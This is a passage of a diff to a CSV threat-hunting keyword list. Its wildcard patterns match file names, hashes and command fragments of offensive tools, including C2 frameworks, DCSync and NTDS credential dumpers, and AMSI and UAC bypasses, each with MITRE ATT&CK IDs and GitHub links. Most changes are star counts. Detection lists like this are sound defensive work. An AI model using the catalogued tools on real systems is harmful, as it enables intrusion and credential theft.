T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" @@ -9126,28 +9274,28 @@ "*dbc2LoaderWrapperCLR_x64.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x86.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*DBC2-master.zip*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*dccon.exe -encrypt2*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dcenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*dchrastil*","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" +"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" "*dcipher-cli*","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","224","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" -"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" -"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" -"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*DCOMPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMPotato-master*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMReflection.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*dcrypt_bartpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dcrypt_install.iss*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dcrypt_setup_*.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" @@ -9159,11 +9307,11 @@ "*dcsync_inject*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dcsyncattack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*dcsyncclient.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*deb.torproject.org/torproject.org/*.asc*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DebugAmsi.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" @@ -9173,31 +9321,31 @@ "*DebugAmsix64.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix86.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*decoder-it/LocalPotato*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - 